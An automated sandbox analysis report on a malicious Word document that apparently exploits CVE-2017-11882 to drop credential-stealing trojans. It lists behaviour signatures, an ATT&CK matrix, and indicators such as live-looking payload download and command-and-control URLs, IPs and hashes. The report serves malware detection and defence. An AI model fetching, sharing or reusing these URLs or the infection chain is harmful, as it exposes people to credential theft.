                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: PopPassword21_2_0040D069
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: SmtpPassword21_2_0040D069
                  Source: Yara matchFile source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts33
                  Exploitation for Client Execution
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  5
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  2
                  Credentials in Registry
                  13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Browser Session Hijacking
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  3
                  Obfuscated Files or Information
                  Security Account Manager11
                  Security Software Discovery
                  SMB/Windows Admin Shares2
                  Data from Local System
                  4
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Install Root Certificate
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Email Collection
                  115
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets31
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Timestomp
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Masquerading
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                  Virtualization/Sandbox Evasion
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
                  Process Injection
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1446718 Sample: SCB REmittance Advice.doc Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 62 Snort IDS alert for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 19 other signatures 2->68 8 WINWORD.EXE 336 14 2->8         started        10 taskeng.exe 2->10         started        process3 process4 12 EQNEDT32.EXE 11 8->12         started        17 EQNEDT32.EXE 8->17         started        19 XxENUzWteJXT.exe 10->19         started        dnsIp5 60 universalmovies.top 104.21.74.191, 443, 49163 CLOUDFLARENETUS United States 12->60 50 C:\Users\user\AppData\...\sharon38892.exe, PE32 12->50 dropped 52 C:\Users\user\AppData\...\sharonzx[1].exe, PE32 12->52 dropped 88 Installs new ROOT certificates 12->88 90 Office equation editor establishes network connection 12->90 92 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->92 21 sharon38892.exe 5 12->21         started        94 Multi AV Scanner detection for dropped file 19->94 96 Tries to steal Mail credentials (via file registry) 19->96 98 Machine Learning detection for dropped file 19->98 100 2 other signatures 19->100 25 powershell.exe 19->25         started        27 powershell.exe 19->27         started        29 schtasks.exe 19->29         started        31 XxENUzWteJXT.exe 19->31         started        file6 signatures7 process8 file9 46 C:\Users\user\AppData\...\XxENUzWteJXT.exe, PE32 21->46 dropped 48 C:\Users\user\AppData\Local\...\tmp5C05.tmp, XML 21->48 dropped 80 Multi AV Scanner detection for dropped file 21->80 82 Machine Learning detection for dropped file 21->82 84 Uses schtasks.exe or at.exe to add and modify task schedules 21->84 86 2 other signatures 21->86 33 sharon38892.exe 153 21->33         started        38 powershell.exe 4 21->38         started        40 powershell.exe 4 21->40         started        42 schtasks.exe 21->42         started        signatures10 process11 dnsIp12 54 188.114.96.3, 49169, 49172, 49173 CLOUDFLARENETUS European Union 33->54 56 188.114.96.9, 49165, 49177, 49202 CLOUDFLARENETUS European Union 33->56 58 2 other IPs or domains 33->58 44 C:\Users\user\AppData\...\5879F5.exe (copy), PE32 33->44 dropped 70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 33->70 72 Tries to steal Mail credentials (via file / registry access) 33->72 74 Tries to harvest and steal ftp login credentials 33->74 76 Tries to harvest and steal browser information (history, passwords, etc) 33->76 78 Installs new ROOT certificates 38->78 file13 signatures14

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  SCB REmittance Advice.doc42%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\sharon38892.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)42%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\AppData\Roaming\sharon38892.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://alphastand.top/alien/fre.php100%URL Reputationmalware
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://tempuri.org/DataSet1.xsd0%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://alphastand.win/alien/fre.php100%URL Reputationmalware
                  http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  https://universalmovies.top/sharonzx.exe100%Avira URL Cloudphishing
                  http://rocheholding.top/evie3/five/fre.php100%Avira URL Cloudmalware
                  https://universalmovies.top/100%Avira URL Cloudphishing
                  https://universalmovies.top/sharonzx.exeoC:100%Avira URL Cloudphishing
                  http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources0%Avira URL Cloudsafe
                  https://universalmovies.top/sharonzx.exej100%Avira URL Cloudphishing
                  https://universalmovies.top/sharonzx.exemmC:100%Avira URL Cloudphishing
                  rocheholding.top/evie3/five/fre.php100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  universalmovies.top
                  104.21.74.191
                  truetrue
                    unknown
                    rocheholding.top
                    188.114.97.3
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://universalmovies.top/sharonzx.exetrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://kbfvzoboss.bid/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      http://alphastand.top/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      http://alphastand.win/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      http://alphastand.trade/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      rocheholding.top/evie3/five/fre.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://rocheholding.top/evie3/five/fre.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resourcessharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://universalmovies.top/EQNEDT32.EXE, 00000002.00000002.348345473.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.ibsensoftware.com/XxENUzWteJXT.exe, XxENUzWteJXT.exe, 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://universalmovies.top/sharonzx.exeoC:EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://tempuri.org/DataSet1.xsdsharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://universalmovies.top/sharonzx.exejEQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesharon38892.exe, 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, XxENUzWteJXT.exe, 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://universalmovies.top/sharonzx.exemmC:EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      188.114.96.9
                      unknownEuropean Union
                      13335CLOUDFLARENETUStrue
                      104.21.74.191
                      universalmovies.topUnited States
                      13335CLOUDFLARENETUStrue
                      188.114.97.3
                      rocheholding.topEuropean Union
                      13335CLOUDFLARENETUStrue
                      188.114.96.3
                      unknownEuropean Union
                      13335CLOUDFLARENETUStrue
                      188.114.97.9
                      unknownEuropean Union
                      13335CLOUDFLARENETUStrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446718
                      Start date and time:2024-05-23 20:16:36 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 40s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:SCB REmittance Advice.doc
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winDOC@24/25@100/5
                      EGA Information:
                      • Successful, ratio: 75%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 102
                      • Number of non-executed functions: 15
                      Cookbook Comments:
                      • Found application associated with file extension: .doc
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 2740 because there are no executed function
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: SCB REmittance Advice.doc
                      TimeTypeDescription
                      11:17:32Task SchedulerRun new task: XxENUzWteJXT path: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                      14:17:22API Interceptor303x Sleep call for process: EQNEDT32.EXE modified
                      14:17:26API Interceptor6597x Sleep call for process: sharon38892.exe modified
                      14:17:29API Interceptor6x Sleep call for process: schtasks.exe modified
                      14:17:29API Interceptor67x Sleep call for process: powershell.exe modified
                      14:17:33API Interceptor37x Sleep call for process: XxENUzWteJXT.exe modified
                      14:17:33API Interceptor193x Sleep call for process: taskeng.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      188.114.96.9ARRIVAL NOTICE.docGet hashmaliciousLokibotBrowse
                      • spencerstuartllc.top/evie2/five/fre.php
                      file.exeGet hashmaliciousSmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousSmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousDjvu, Fabookie, RedLine, SmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousDjvu, SmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousFabookie, SmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousDjvu, ManusCrypt, SmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, RedLine, SmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, RedLine, SmokeLoaderBrowse
                      • potunulit.org/
                      file.exeGet hashmaliciousFabookie, RedLine, SmokeLoaderBrowse
                      • potunulit.org/
                      104.21.74.191file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                      • tuong.me/wp-login.php
                      188.114.97.3WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
                      http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
                      • hjkie5.pages.dev/
                      56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                      • qr-in.com/GDKZCby
                      Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                      • qr-in.com/atBVKxq
                      56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                      • qr-in.com/GDKZCby
                      file.exeGet hashmaliciousUnknownBrowse
                      • wagner3.net/admin
                      Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                      • www.sba99prag.com/pshj/
                      ORDIN.xlsGet hashmaliciousUnknownBrowse
                      • qr-in.com/HDYwZbx
                      ORDIN.xlsGet hashmaliciousUnknownBrowse
                      • qr-in.com/HDYwZbx
                      SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                      • www.ilodezu.com/z48v/
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      rocheholding.topUMWJhzdI7q.exeGet hashmaliciousLokibotBrowse
                      • 188.114.96.3
                      Request order.docGet hashmaliciousLokibotBrowse
                      • 188.114.97.3
                      1hoqdSJ4ie.exeGet hashmaliciousLokibotBrowse
                      • 104.21.65.180
                      questionnaire form.docGet hashmaliciousLokibotBrowse
                      • 104.21.65.180
                      nmHRO64KQK.exeGet hashmaliciousLokibotBrowse
                      • 172.67.165.74
                      4Omlbm5eBA.exeGet hashmaliciousLokibotBrowse
                      • 104.21.65.180
                      Revised PI.docGet hashmaliciousLokibotBrowse
                      • 104.21.65.180
                      Purchase_Order.docGet hashmaliciousLokibotBrowse
                      • 104.21.65.180
                      new_order.docGet hashmaliciousLokibotBrowse
                      • 104.21.65.180
                      universalmovies.topPYR0948.docGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      Doc PI.docGet hashmaliciousFormBookBrowse
                      • 104.21.74.191
                      PO051524.docGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      Scanned doc 03945.docGet hashmaliciousAgentTeslaBrowse
                      • 104.21.74.191
                      GENERALGROUP INV FWDRB42024.docGet hashmaliciousLokibotBrowse
                      • 104.21.74.191
                      Revised PI.docGet hashmaliciousLokibotBrowse
                      • 104.21.74.191
                      Signed contract-009988876.docGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      PAYMENT SLIP.docGet hashmaliciousAgentTeslaBrowse
                      • 172.67.162.95
                      PAYROLL.docGet hashmaliciousFormBookBrowse
                      • 172.67.162.95
                      MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                      • 104.21.74.191
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUSV_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                      • 172.67.217.192
                      kam.cmdGet hashmaliciousGuLoaderBrowse
                      • 104.21.28.80
                      https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                      • 104.21.39.66
                      https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                      • 172.64.154.146
                      http://all4promos.comGet hashmaliciousUnknownBrowse
                      • 162.247.243.29
                      Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      • 172.67.74.152
                      nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
                      • 104.26.0.5
                      PstCgdvsgB.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.26.5.15
                      1n4J6tLgsc.exeGet hashmaliciousRisePro StealerBrowse
                      • 104.26.5.15
                      N35q9x6n9c.exeGet hashmaliciousRisePro StealerBrowse
                      • 172.67.75.166
                      CLOUDFLARENETUSV_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                      • 172.67.217.192
                      kam.cmdGet hashmaliciousGuLoaderBrowse
                      • 104.21.28.80
                      https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                      • 104.21.39.66
                      https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                      • 172.64.154.146
                      http://all4promos.comGet hashmaliciousUnknownBrowse
                      • 162.247.243.29
                      Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      • 172.67.74.152
                      nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
                      • 104.26.0.5
                      PstCgdvsgB.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.26.5.15
                      1n4J6tLgsc.exeGet hashmaliciousRisePro StealerBrowse
                      • 104.26.5.15
                      N35q9x6n9c.exeGet hashmaliciousRisePro StealerBrowse
                      • 172.67.75.166
                      CLOUDFLARENETUSV_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                      • 172.67.217.192
                      kam.cmdGet hashmaliciousGuLoaderBrowse
                      • 104.21.28.80
                      https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                      • 104.21.39.66
                      https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                      • 172.64.154.146
                      http://all4promos.comGet hashmaliciousUnknownBrowse
                      • 162.247.243.29
                      Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      • 172.67.74.152
                      nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
                      • 104.26.0.5
                      PstCgdvsgB.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.26.5.15
                      1n4J6tLgsc.exeGet hashmaliciousRisePro StealerBrowse
                      • 104.26.5.15
                      N35q9x6n9c.exeGet hashmaliciousRisePro StealerBrowse
                      • 172.67.75.166
                      CLOUDFLARENETUSV_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                      • 172.67.217.192
                      kam.cmdGet hashmaliciousGuLoaderBrowse
                      • 104.21.28.80
                      https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                      • 104.21.39.66
                      https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                      • 172.64.154.146
                      http://all4promos.comGet hashmaliciousUnknownBrowse
                      • 162.247.243.29
                      Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      • 172.67.74.152
                      nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
                      • 104.26.0.5
                      PstCgdvsgB.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                      • 104.26.5.15
                      1n4J6tLgsc.exeGet hashmaliciousRisePro StealerBrowse
                      • 104.26.5.15
                      N35q9x6n9c.exeGet hashmaliciousRisePro StealerBrowse
                      • 172.67.75.166
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      7dcce5b76c8b17472d024758970a406b948209184.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 104.21.74.191
                      documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 104.21.74.191
                      Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      PYR0948.docGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      New Order.docGet hashmaliciousFormBookBrowse
                      • 104.21.74.191
                      ORDER FB8190311.docGet hashmaliciousLokibotBrowse
                      • 104.21.74.191
                      1080.xlsGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      20240403_Oferta factory..xlsGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      Sipari#U015f detaylar#U0131.xlsGet hashmaliciousUnknownBrowse
                      • 104.21.74.191
                      No context
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):0.34726597513537405
                      Encrypted:false
                      SSDEEP:3:Nlll:Nll
                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:@...e...........................................................
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):771592
                      Entropy (8bit):6.706936119730989
                      Encrypted:false
